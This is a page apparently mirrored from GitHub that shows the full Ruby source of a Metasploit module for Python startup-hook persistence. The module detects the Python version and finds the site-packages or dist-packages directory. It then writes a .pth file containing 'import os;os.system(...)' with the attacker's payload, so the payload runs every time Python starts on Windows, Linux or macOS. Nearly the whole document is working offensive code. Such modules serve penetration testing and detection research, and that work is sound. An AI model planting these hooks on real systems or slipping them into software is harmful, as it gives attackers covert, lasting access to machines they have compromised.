Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/persistence/python_site_specific_hook.rb
31433 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html

8


9
  include Msf::Post::Linux::Priv

10
  include Msf::Post::File

11
  include Msf::Exploit::EXE

12
  include Msf::Exploit::FileDropper

13
  include Msf::Exploit::Local::Persistence

14
  prepend Msf::Exploit::Remote::AutoCheck

15


16
  def initialize(info = {})

17
    super(

18
      update_info(

19
        info,

20
        'Name' => 'Python Site-Specific Hook Persistence',

21
        'Description' => %q{

22
          This module leverages Python's startup mechanism, where some files can be automically processed during the initialization of the Python interpreter. One of those files are startup hooks (site-specific, dist-packages). If these files are present in site-specific or dist-packages directories, any lines beginning with import will be executed automatically. This creates a persistence mechanism, if an attacker has established access to target machine with sufficient permissions.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'msutovsky-r7', # msf module

27
        ],

28
        'Platform' => ['linux', 'windows', 'osx'],

29
        'Arch' => [ ARCH_CMD ],

30
        'SessionTypes' => [ 'meterpreter', 'shell' ],

31
        'Targets' => [[ 'Auto', {} ]],

32
        'References' => [

33
          [ 'URL', 'https://docs.python.org/3/library/site.html'],

34
          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],

35
          ['ATT&CK', Mitre::Attack::Technique::T1546_018_PYTHON_STARTUP_HOOKS],

36
        ],

37
        'DisclosureDate' => '2012-09-29',

38
        'DefaultTarget' => 0,

39
        'Notes' => {

40
          'Stability' => [CRASH_SAFE],

41
          'Reliability' => [REPEATABLE_SESSION],

42
          'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]

43
        }

44
      )

45
    )

46
    register_options([

47
      OptString.new('PYTHON_HOOK_PATH', [false, 'The path to Python site-specific hook directory']),

48
      OptEnum.new('EXECUTION_TARGET', [true, 'Selects if persistence is installed under current user or for all users', 'USER', ['USER', 'SYSTEM']])

49
    ])

50
  end

51


52
  def get_hooks_path

53
    unless datastore['PYTHON_HOOK_PATH'].blank?

54
      @hooks_path = datastore['PYTHON_HOOK_PATH']

55
      return

56
    end

57
    case session.platform

58
    when 'windows', 'win'

59


60
      case datastore['EXECUTION_TARGET']

61
      when 'USER'

62
        @hooks_path = expand_path("%USERPROFILE%/AppData/Local/Programs/Python/Python#{@python_version.sub('.', '')}/Lib/site-packages/")

63
      when 'SYSTEM'

64
        @hooks_path = "C:/Python#{@python_version.sub('.', '')}/Lib/site-packages/"

65
      end

66
    when 'osx', 'linux'

67


68
      case datastore['EXECUTION_TARGET']

69
      when 'USER'

70
        @hooks_path = expand_path("$HOME/.local/lib/python#{@python_version}/site-packages/")

71
      when 'SYSTEM'

72
        @hooks_path = "/usr/local/lib/python#{@python_version}/dist-packages/"

73
      end

74
    end

75
  end

76


77
  def get_python_version

78
    case session.platform

79
    when 'windows', 'win'

80
      cmd_exec('cmd.exe /c python3.exe --version 2> nul || python2.exe --version 2> nul || python.exe --version 2> nul || py.exe --version 2> nul') =~ /(\d+.\d+).\d+/

81
    when 'osx', 'linux'

82
      cmd_exec('python3 --version 2>/dev/null || python2 --version 2> /dev/null || python --version 2>/dev/null') =~ /(\d+.\d+).\d+/

83
    end

84


85
    @python_version = Regexp.last_match(1)

86
  end

87


88
  def check

89
    get_python_version

90


91
    return CheckCode::Safe('Python not present on the system') unless @python_version

92


93
    CheckCode::Vulnerable('Python is present on the system')

94
  end

95


96
  def install_persistence

97
    get_python_version unless @python_version

98
    print_status("Detected Python version #{@python_version}")

99
    get_hooks_path unless @hooks_path

100


101
    mkdir(@hooks_path) if session.platform == 'osx' || session.platform == 'linux'

102


103
    fail_with(Failure::NotFound, "The hooks path #{@hooks_path} does not exists") unless directory?(@hooks_path)

104
    # check if hooks path writable

105
    begin

106
      # windows only ps payloads have writable? so try that first

107
      fail_with(Failure::NoAccess, "No permission to write to #{@hooks_path}") unless writable?(@hooks_path)

108
    rescue RuntimeError

109
      filename = @hooks_path + '\\' + Rex::Text.rand_text_alpha((rand(6..13)))

110
      write_file(filename, '')

111
      fail_with(Failure::NoAccess, "No permission to write to #{@hooks_path}") unless exists?(filename)

112
      rm_f(filename)

113
    end

114


115
    print_status("Got path to site-specific hooks #{@hooks_path}")

116


117
    file_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(5..10)

118


119
    fail_with(Failure::PayloadFailed, 'Failed to create malicious hook') unless write_file("#{@hooks_path}#{file_name}.pth", %(import os;os.system("#{payload.encoded}") ))

120


121
    print_good("Successfully created malicious hook #{@hooks_path}#{file_name}.pth")

122
    @clean_up_rc << "rm #{@hooks_path}#{file_name}.pth\n"

123
  end

124
end

125


126